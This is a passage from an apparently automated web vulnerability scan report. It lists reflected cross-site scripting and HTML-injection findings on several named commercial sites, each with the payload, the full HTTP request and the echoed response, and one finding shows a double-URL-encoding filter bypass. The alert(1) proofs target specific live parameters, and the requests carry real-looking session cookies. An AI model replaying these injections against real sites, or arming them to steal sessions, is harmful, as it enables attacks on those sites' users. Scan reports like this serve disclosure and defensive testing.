Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:22 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:22 GMT
Connection: close
Content-Length: 48890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955622000,
       editionToServe: 'international',
       queryString: 'b3db0'-alert(1)-'d49f53f3de4=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.84. https://secure.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2231d<a>d37eab15273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join2231d<a>d37eab15273/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d37eab15273">Whois record for "join2231d<a>d37eab15273"</a>
...[SNIP]...

3.85. https://secure.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5126"><a>5636737d81b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joind5126"><a>5636737d81b/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joind5126"><a>5636737d81b">
...[SNIP]...

3.86. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92168"><a>6a3fe2a15c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in92168"><a>6a3fe2a15c7/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=log-in92168"><a>6a3fe2a15c7">
...[SNIP]...

3.87. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d261<a>85e8fbdd7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in6d261<a>85e8fbdd7f2/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>85e8fbdd7f2">Whois record for "log-in6d261<a>85e8fbdd7f2"</a>
...[SNIP]...

3.88. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7922<a>15d716d7dbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f7922<a>15d716d7dbb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>15d716d7dbb">Whois record for "f7922<a>15d716d7dbb"</a>
...[SNIP]...

3.89. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98306"><a>183c19664cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shopping-cart98306"><a>183c19664cb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=shopping-cart98306"><a>183c19664cb">
...[SNIP]...

3.90. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ab504<script>alert(1)</script>dbf1c364134 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310994092251-573687&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=3&user.profile=B2C&entity.id=5635&entity.categoryId=Phone%2CPhone%3AAllPhonesAndDevices&ContractPeriod=2Yr&entity.name=HTC%20Trophy%26amp%3Btrade%3B&entity.type=PDA%2FSmartPhones&entity.make=HTC&entity.model=Trophy%26amp%3Btrade%3B&entity.pageURL=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26amp%3Baction%3DviewPhoneDetail%26amp%3BselectedPhoneId%3D5635&entity.thumbnailURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fphones%2Fmini%2Fhtc_trophy.png&entity.capabilities_96=false&entity.capabilities_147=false&entity.capabilities_150=true&entity.capabilities_193=false&entity.capabilities_194=false&entity.capabilities_198=false&entity.inventory=3435&entity.preorder=false&entity.ratings=4.6209&entity.reviews=306&entity.ratingURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fshared%2Freviews%2Fsm_star_4_5.png&path=phoneFirst&loggedin=false&planId=0&mbox=productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134&mboxId=0&mboxTime=1310976102252&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17; mboxSession=1310993870949-319721

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 13:03:24 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 220
Date: Mon, 18 Jul 2011 13:03:24 GMT
Server: Test & Target

mboxFactories.get('default').get('productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1310569554435-90226.17");

3.91. http://wireless.amazon.com/alohaCartRequest [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /alohaCartRequest

Issue detail

The value of the zip request parameter is copied into the HTML document as plain text between tags. The payload 76487<img%20src%3da%20onerror%3dalert(1)>66af90f3644d32ac9 was submitted in the zip parameter. This input was echoed as 76487<img src=a onerror=alert(1)>66af90f3644d32ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /alohaCartRequest?appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=1001076487<img%20src%3da%20onerror%3dalert(1)>66af90f3644d32ac9&type=BUNDLE HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW
Cookie: session-id=179-2761153-4689763; session-id-time=1311598655l
Pragma: no-cache
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:37 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:01:37 GMT; Path=/
Set-Cookie: session-token="g5MNmYG+8nWRZ8LG+IOSp1IkH1q+UWtxSVVA/fYm/bDm2BUyDOn97BLd4HDfnpufFh49AwGKfEMoABAshxomL5aFUqZOZcNz/nR2T6GhnRlXI/pu+0O0wLh+f2AdMEo0+21WTNItbxbohlDmhXeiaJ2IZjWTiBh2uz5vqT604l5gYwuYwf25ruyU9JnoYaMwd9e4l/Qd3atVmxfVYWuPHg=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:11:37 GMT; Path=/
Content-Length: 1263


{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_PLAN","url":"/b/684182011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":false,"compatibilityMessage":"This phone is not available in ZIP Code 1001076487<img src=a onerror=alert(1)>66af90f3644d32ac9","compatibilityLink":"<a href=\"/b/684177011/ref=bb_br_ph_dp\">
...[SNIP]...

3.92. http://www.bestbuy.com/site/olstemplatemapper.jsp [_DARGS parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bestbuy.com
Path:   /site/olstemplatemapper.jsp

Issue detail

The value of the _DARGS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0316'-alert(1)-'cabc5e5b3d7 was submitted in the _DARGS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /site/olstemplatemapper.jsp?_DARGS=/site/en_US/catalog/browse/fragments/includes/olsmbpkgdevicetranspopup.jspc0316'-alert(1)-'cabc5e5b3d7 HTTP/1.1
Host: www.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17408&width=400&skuID=2330093&isCntrctSelect=false&productId=1218323066904&contractDesc=&TB_iframe=true&&type=page&documentType=mobile&parentPage=PDP&modal=true&keepThis=true&height=250
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; akaau=1310995660~id=1ba8cb2e676cea6446c2d3ded776fcfc; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993885945
Content-Type: application/x-www-form-urlencoded
Content-Length: 777

_dyncharset=ISO-8859-1&_dynSessConf=-189911339780467805&pspSkuId=&pspProductId=&parentSkuId=2330093&parentProductId=1218323066904&customerType=N&_D%3AcustomerType=+&_D%3AcustomerType=+&newRadio=cnt202
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
X-Powered-By:
Vary: Accept-Encoding
Expires: Mon, 18 Jul 2011 12:58:29 GMT
Pragma: no-cache
Date: Mon, 18 Jul 2011 12:58:29 GMT
Content-Length: 1398
Connection: close
Cache-Control: no-store

<!DOCTYPE html>
<!-- B:226 -->
<!-- B:005 -->
<!-- bbolsp-app05/dlpolsapp28-40-11-6 -->
<!-- E:005 -->
<!-- B:0OD -->
<!-- B:185 -->
<script>
var popupUrl='/site/olstemplatemapper.jsp?_DARGS=/site/en_US/catalog/browse/fragments/includes/olsmbpkgdevicetranspopup.jspc0316'-alert(1)-'cabc5e5b3d7';
</script>
...[SNIP]...

3.93. http://www.dnsstuff.com/tools/ipall/ [ip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the ip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c187f"><img%20src%3da%20onerror%3dalert(1)>deb3acbb8a6 was submitted in the ip parameter. This input was echoed as c187f\"><img src=a onerror=alert(1)>deb3acbb8a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84c187f"><img%20src%3da%20onerror%3dalert(1)>deb3acbb8a6 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:04:46 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:04:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14129
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84c187f\"><img src=a onerror=alert(1)>deb3acbb8a6&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;deb3acbb8a6=">
...[SNIP]...

3.94. http://www.dnsstuff.com/tools/ipall/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11b31e10794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1cf0b\"><script>alert(1)</script>11b31e10794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84&1cf0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11b31e10794=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:06:13 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:06:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14122
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84&1cf0b%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e11b31e10794=1&1cf0b\"><script>alert(1)</script>11b31e10794=1">
...[SNIP]...

3.95. http://www.dnsstuff.com/tools/ipall/ [token parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b50eb"><img%20src%3da%20onerror%3dalert(1)>c9e633bed88 was submitted in the token parameter. This input was echoed as b50eb\"><img src=a onerror=alert(1)>c9e633bed88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=b50eb"><img%20src%3da%20onerror%3dalert(1)>c9e633bed88&toolhandler_redirect=0&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:54 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:03:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=b50eb\"><img src=a onerror=alert(1)>c9e633bed88&toolhandler_redirect=0&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;c9e633bed88=">
...[SNIP]...

3.96. http://www.dnsstuff.com/tools/ipall/ [tool_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the tool_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca4b"><img%20src%3da%20onerror%3dalert(1)>cbe6d23089b was submitted in the tool_id parameter. This input was echoed as dca4b\"><img src=a onerror=alert(1)>cbe6d23089b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67dca4b"><img%20src%3da%20onerror%3dalert(1)>cbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:25 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:03:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

